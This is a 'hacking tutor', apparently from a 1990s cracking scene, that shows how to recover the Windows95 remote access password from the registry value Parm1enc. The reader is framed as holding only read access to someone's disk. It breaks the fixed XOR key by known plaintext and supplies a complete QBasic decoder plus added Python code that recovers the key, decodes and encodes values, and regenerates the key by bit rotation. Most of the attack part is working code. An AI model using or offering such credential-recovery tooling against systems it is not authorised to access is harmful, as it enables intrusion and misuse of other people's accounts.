

 .---.        .---.                                                                 .----------.
 |    \      /    |    .-.                                                          |          |
 |  |\ \    / /|  |    `-'    .--------.   .-----------.  .---------.  .-------.    |  .-------'
 |  | \ \  / / |  |    .-.    | .------'   `----. .----'  | .-------'  | ,---. |    |  | 
 |  |  \ \/ /  |  |    | |    | |               | |       | |          | |   | |    |  `----.
 |  |   \__/   |  |    | |    \ \               | |       | `----.     | `---' |    |  ,----'
 |  |          |  |    | |     \ `-----.        | |       | ,----'     |  .---'     |  |
 |  |          |  |    | |      `----. |        | |       | |          | , \        |  |
 |  |          |  |    | |           | |        | |       | |          | |\ \       |  |
 |  |          |  |    | |           | |        | |       | |          | | \ \      |  '-------.
 |  |          |  |    | |    .------' |        | |       | '------.   | |  \ \     |          |
 `--'          `--'    `-'    `--------'        `-'       `--------'   `-'   `-'    `----------'


                                  .----------------------. 
                      .-----------|   Proudly Presents   |-----------.
       .--------------+----------------------------------------------+--------------.
       |                            A hacking tutor for:                            |
       |                    The Windows95 remote access password                    |
       `----------------------------------------------------------------------------'


Imagine this: you have read-only access to a hard disk. You don't want read-only access, you
want to change things a little bit ;-)
You know that Remote Access (using netwatch.exe) is enabled, but you only have the encoded
password from the registry, not the real one.
Looks like you have to read this tutor, so get a nice hot cup of tea and get going.

Note: I am not sure if I translated "remote access" correctly, it could also be "remote control"


I have used these programs:

- Windows95 V4.00.950
- Regedit (in your windows directory)
- QBasic V4.5 (you could also use an older version, you'll know when your QBasic is too old ;-)


Getting Started:
In the following text we shall decode the Windows95 remote access password.
I have written a decoder to do so.


Let's start!
First we have to find out where Windows95 stores the remote access password.
Open regedit.exe and search for admin$, you will end up here:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ADMIN$

The value Parm1enc (Parm1 enc(rypted)) looks interesting. Let's see what happens to it when we
change the password.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                            Changing the remote access password                              =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

First:  go to => start => settings => control panel => network
        click on "sharing files and printers"
        check if "I want to give others access to my files" is enabled
second: go to => start => settings => control panel => security
        click on "remote access"
        change the password to "00000000"

Fire up regedit and look at Parm1enc again, it should now read "05 aa 7d 96 63 99 e4 5a".


Note that the password has a maximum length of 8 characters, and that each decoded character
takes 2 digits in coded form, in other words one byte per character.
These digits are hexadecimal, you know: 0 1 2 3 4 5 6 7 8 9 a b c d e f, and then 10 for sixteen.
If you can't count in hexadecimal or binary, get a tutorial on that somewhere.

Check out Appendix A for the ASCII codes.
The ASCII code for the symbol "0" is 30 hexadecimal, that is 48 decimal and 110000 binary.

In some way the encoding routine changes 48 decimal into 5, thus 110000 into 000101.


Let's guess that the encoding routine performs a XOR with a fixed key:

     110000 <= 1st symbol of our password = "0"
     ?????? <= (de)coding key
     ------ <= perform XOR
     000101 <= coded password

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                                   XOR (exclusive or)                                        =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


    input value a   |   input value b  | output value
    -------------------------------------------------
           1        |         1        |      0
           1        |         0        |      1
           0        |         1        |      1
           0        |         0        |      0

Now lets solve this little problem:

   110000  <= decoded symbol                      110000
   ??????  <= (de)codation key      answer =>     110101
   ------  <= perform XOR                         ------
   000101  <= coded symbol                        000101
                                    
The answer is 110101 binary = 53 decimal = 35 hexadecimal.
One pair of values is not proof yet, so let's see if the same key works for another password too!
                                    
Set the first character to "2" (ASCII 50 decimal): it is encoded to "07", that is 000111 binary
                                    
  110010  <= 50                    110010
  ??????                answer =>  110101
  ------   perform XOR             ------
  000111  <= 7                     000111

?????? = 110101 = 53 again!!

Yep, the same key pops out, so the XOR guess holds!!!!
Doesn't that feel great?
Now do some practice yourself: change the other 7 characters one at a time and recover the key
byte for each position (the key is different for every position, so you need all 8).
You can find the answers at the bottom of this text file.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                                      Decoding                                               =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Decoding isn't a problem, because now we know the (de)coding key. I'll show you how to decode.
We have noticed that the first symbol is coded with the key "53". Now guess what
happens when we perform another XOR with that same key (XOR is its own inverse):

    000101  <= coded symbol
    110101  <= decoding key
    ------  <= perform XOR
    110000  <= decoded symbol   = 48 decimal = ASCII code "0"

We have DEcoded the 1st symbol!!!!
Because the key is fixed and the same on every Windows95 machine, anyone who can read Parm1enc
(read access to the registry file is enough) can recover the password. XOR with a constant key
is obfuscation, not encryption.
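The key recovery from the XOR section and the decoding step above, done in Python rather than QBasic, as an added example. This is not the tutorial's own decoder; the only inputs taken from the text are the known pair "00000000" / 05aa7d966399e45a and the "07" check value for the character "2". It recovers the eight key bytes from the known plaintext, decodes any Parm1enc value as regedit shows it (spaces and upper/lower case don't matter), and also encodes, so you can check a candidate password against the registry without changing anything. Like the QBasic decoder, it assumes Parm1enc holds exactly one byte per password character.

```python
# Added example (not part of the original tutorial): recover the XOR key from a
# known-plaintext pair, then decode or encode a Win95 Parm1enc value.

# Known plaintext/ciphertext pair quoted in the text: the password "00000000"
# is stored in Parm1enc as 05 aa 7d 96 63 99 e4 5a.
KNOWN_PLAINTEXT = b"00000000"
KNOWN_CIPHERTEXT = bytes.fromhex("05aa7d966399e45a")


def recover_key(plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known-plaintext attack on a per-position XOR: key = plaintext XOR ciphertext."""
    if len(plaintext) != len(ciphertext):
        raise ValueError("plaintext and ciphertext must be the same length")
    return bytes(p ^ c for p, c in zip(plaintext, ciphertext))


# Recovered once here; should come out as 35 9a 4d a6 53 a9 d4 6a.
KEY = recover_key(KNOWN_PLAINTEXT, KNOWN_CIPHERTEXT)


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR each byte with the key byte for its position (same op encodes and decodes)."""
    if len(data) > len(key):
        raise ValueError("Parm1enc holds at most %d characters" % len(key))
    return bytes(b ^ k for b, k in zip(data, key))


def decode_parm1enc(hex_value: str) -> str:
    """Turn the hex string regedit shows into the password."""
    clean = "".join(hex_value.split())          # accept "05 aa 7d ..." as well as "05aa7d..."
    if len(clean) % 2:
        raise ValueError("odd number of hex digits")
    return xor_with_key(bytes.fromhex(clean)).decode("latin-1")


def encode_password(password: str) -> str:
    """Inverse direction: what Parm1enc would contain for this password."""
    return xor_with_key(password.encode("latin-1")).hex()


if __name__ == "__main__":
    print("key     :", KEY.hex())
    print("decoded :", decode_parm1enc("05 aa 7d 96 63 99 e4 5a"))
    print("decoded :", decode_parm1enc("07aa7d966399e45a"))   # "2" in the first position
    print("encoded :", encode_password("secret"))
```

Feed it the other seven single-character changes from the exercise above and `recover_key` will hand you all eight key bytes at once; the `encode_password` direction is the cheap way to confirm a guess when you can read the registry but are not allowed to write to it.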

I have already written a decoder for you. It is written in Microsoft Q(uick)Basic,
because almost everyone has QBasic (included with MS-DOS), and you can get it for free at some sites.
If you want to run the W95 remote access decoder yourself, cut and paste the program into
a new file, then open it with QBasic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=                                      My decoder                                             =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


My program accepts the coded password in this form: 05aa7d966399e45a = "00000000"
Here is my QBasic program:


CLS                                       ' clear screen                                   
start:                                    ' label
PRINT "Windows95 remote access decoder"   ' put message on screen
PRINT "Decoder by MisterE"
PRINT
PRINT
PRINT "coded password";
INPUT a$
a$ = UCASE$(a$)                           ' convert password to uppercase
                                          ' this is needed because my program
                                          ' doesn't accept "0f".


lengthcodedpassword = LEN(a$)             ' calculate length of coded password


digit12$ = MID$(a$, 1, 2)                 ' get 1st 2 digits of coded password
digit$ = digit12$
GOSUB determinedecimalnumber              '  / routine to convert hexadecimal
digit12 = digit                           '  \ ASCII string to decimal integer

digit34$ = MID$(a$, 3, 2)                 ' get 3rd and 4th digit
digit$ = digit34$
GOSUB determinedecimalnumber              ' routine
digit34 = digit

digit56$ = MID$(a$, 5, 2)                 ' get 5th and 6th digit
digit$ = digit56$
GOSUB determinedecimalnumber              ' routine
digit56 = digit

digit78$ = MID$(a$, 7, 2)
digit$ = digit78$
GOSUB determinedecimalnumber
digit78 = digit

digit910$ = MID$(a$, 9, 2)
digit$ = digit910$
GOSUB determinedecimalnumber
digit910 = digit

digit1112$ = MID$(a$, 11, 2)
digit$ = digit1112$
GOSUB determinedecimalnumber
digit1112 = digit

digit1314$ = MID$(a$, 13, 2)
digit$ = digit1314$
GOSUB determinedecimalnumber
digit1314 = digit

digit1516$ = MID$(a$, 15, 2)
digit$ = digit1516$
GOSUB determinedecimalnumber
digit1516 = digit





dvalue1 = digit12 XOR 53                  ' /
dvalue2 = digit34 XOR 154                 ' |
dvalue3 = digit56 XOR 77                  ' |   decode coded password
dvalue4 = digit78 XOR 166                 ' |
dvalue5 = digit910 XOR 83                 ' |
dvalue6 = digit1112 XOR 169               ' |
dvalue7 = digit1314 XOR 212               ' |
dvalue8 = digit1516 XOR 106               ' \

a$ = CHR$(dvalue1) + CHR$(dvalue2) + CHR$(dvalue3) + CHR$(dvalue4) + CHR$(dvalue5) + CHR$(dvalue6) + CHR$(dvalue7) + CHR$(dvalue8)
PRINT
PRINT
PRINT

PRINT "decoded password", LEFT$(a$, lengthcodedpassword / 2)
PRINT                    '                 /\
                         '                 ||             
                         ' do not print more than the password length
END

determinedecimalnumber:
FOR loop1 = 0 TO 255
  IF LEFT$(digit$, 1) = "0" THEN             ' check if string starts with 0
    digit$ = RIGHT$(digit$, 1)               ' if so, remove 0
  END IF
  IF HEX$(loop1) = digit$ THEN               ' /  routine to convert
     digit = loop1                           ' |  hexadecimal string to
     loop1 = 255                             ' |  decimal integer
  END IF                                     ' \
NEXT loop1
RETURN


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=================================================================================================
I am not very good at programming, so if you have any comments on how to write a better program,
contact me. One can find me at:

EFNet, #cracking4newbies and #cracking

One may also mail me at MisterE@freemail.nl
       
=================================================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 









                             A P P E N D I X   A

                                 ASCII CODES

Control Characters

     00  NUL   null or time fill        10  DLE   data line escape
     01  SOH   start of heading         11  DC1   device control 1
     02  STX   start of text            12  DC2   device control 2
     03  ETX   end of text              13  DC3   device control 3
     04  EOT   end of transmission      14  DC4   device control 4
     05  ENQ   enquiry                  15  NAK   negative acknowledge
     06  ACK   acknowledge              16  SYN   synchronous idle
     07  BEL   bell                     17  ETB   end of transm blocks
     08  BS    backspace                18  CAN   cancel
     09  HT    horizontal tab           19  EM    end of medium
     0A  LF    line feed                1A  SUB   substitute
     0B  VT    vertical tab             1B  ESC   escape
     0C  FF    form feed                1C  FS    file separator
     0D  CR    carriage return          1D  GS    group selector
     0E  SO    shift out                1E  RS    record separator
     0F  SI    shift in                 1F  US    unit separator
                                        7F  DEL   delete

Graphic Characters

          20        30  0     40  @     50  P     60  ` *   70  p
          21  !     31  1     41  A     51  Q     61  a     71  q
          22  "     32  2     42  B     52  R     62  b     72  r
          23  #     33  3     43  C     53  S     63  c     73  s
          24  $     34  4     44  D     54  T     64  d     74  t
          25  %     35  5     45  E     55  U     65  e     75  u
          26  &     36  6     46  F     56  V     66  f     76  v
          27  '     37  7     47  G     57  W     67  g     77  w
          28  (     38  8     48  H     58  X     68  h     78  x
          29  )     39  9     49  I     59  Y     69  i     79  y
          2A  *     3A  :     4A  J     5A  Z     6A  j     7A  z
          2B  +     3B  ;     4B  K     5B  [     6B  k     7B  { *
          2C  ,     3C  <     4C  L     5C  \ *   6C  l     7C  | *
          2D  -     3D  =     4D  M     5D  ]     6D  m     7D  } *
          2E  .     3E  >     4E  N     5E  ^ *   6E  n     7E  ~ *
          2F  /     3F  ?     4F  O     5F  _     6F  o



                        decimal       binary      hexadecimal
                           ||          ||             ||
                           \/          \/             \/



The answers:  1st character => 53      = 00110101     =   35
              2nd character => 154     = 10011010     =   9a
              3rd character => 77      = 01001101     =   4d
              4th character => 166     = 10100110     =   a6
              5th character => 83      = 01010011     =   53
              6th character => 169     = 10101001     =   a9
              7th character => 212     = 11010100     =   d4
              8th character => 106     = 01101010     =   6a

Notice there is some relation between the keys. Figure out the relation yourself.
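Spoiler ahead: if you want to work out the relation yourself, stop reading here. The following Python is an added check, not the tutorial's code; it takes only the eight key bytes listed above and verifies that each key byte is the previous one rotated right by one bit, which means the whole key can be regenerated from the first byte alone.

```python
# Added example (not part of the original tutorial): verify the relation between the
# eight key bytes given in the answers, and regenerate them from the first one.

from typing import List

# The eight key bytes from the answers table above (1st character ... 8th character).
KEYS_FROM_PAGE = [0x35, 0x9A, 0x4D, 0xA6, 0x53, 0xA9, 0xD4, 0x6A]


def ror8(value: int, bits: int = 1) -> int:
    """Rotate an 8-bit value right by `bits` positions (the low bit wraps to the top)."""
    bits %= 8
    value &= 0xFF
    return ((value >> bits) | (value << (8 - bits))) & 0xFF


def relation_holds(keys: List[int]) -> bool:
    """True if every key byte equals the previous key byte rotated right by one bit."""
    return all(keys[i + 1] == ror8(keys[i]) for i in range(len(keys) - 1))


def key_schedule(seed: int, length: int = 8) -> List[int]:
    """Regenerate the per-position keys from the first byte by repeated rotation."""
    keys = [seed & 0xFF]
    while len(keys) < length:
        keys.append(ror8(keys[-1]))
    return keys


if __name__ == "__main__":
    for position, k in enumerate(KEYS_FROM_PAGE, start=1):
        print("%d. %3d = %s = %02x" % (position, k, format(k, "08b"), k))
    print("relation holds :", relation_holds(KEYS_FROM_PAGE))
    print("regenerated    :", " ".join("%02x" % k for k in key_schedule(0x35)))
```

So the "key" is really one byte, 35 hex, and a rotation: eight rotations of an 8-bit value bring you back to the start, which is why a ninth key byte would simply be 35 again.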
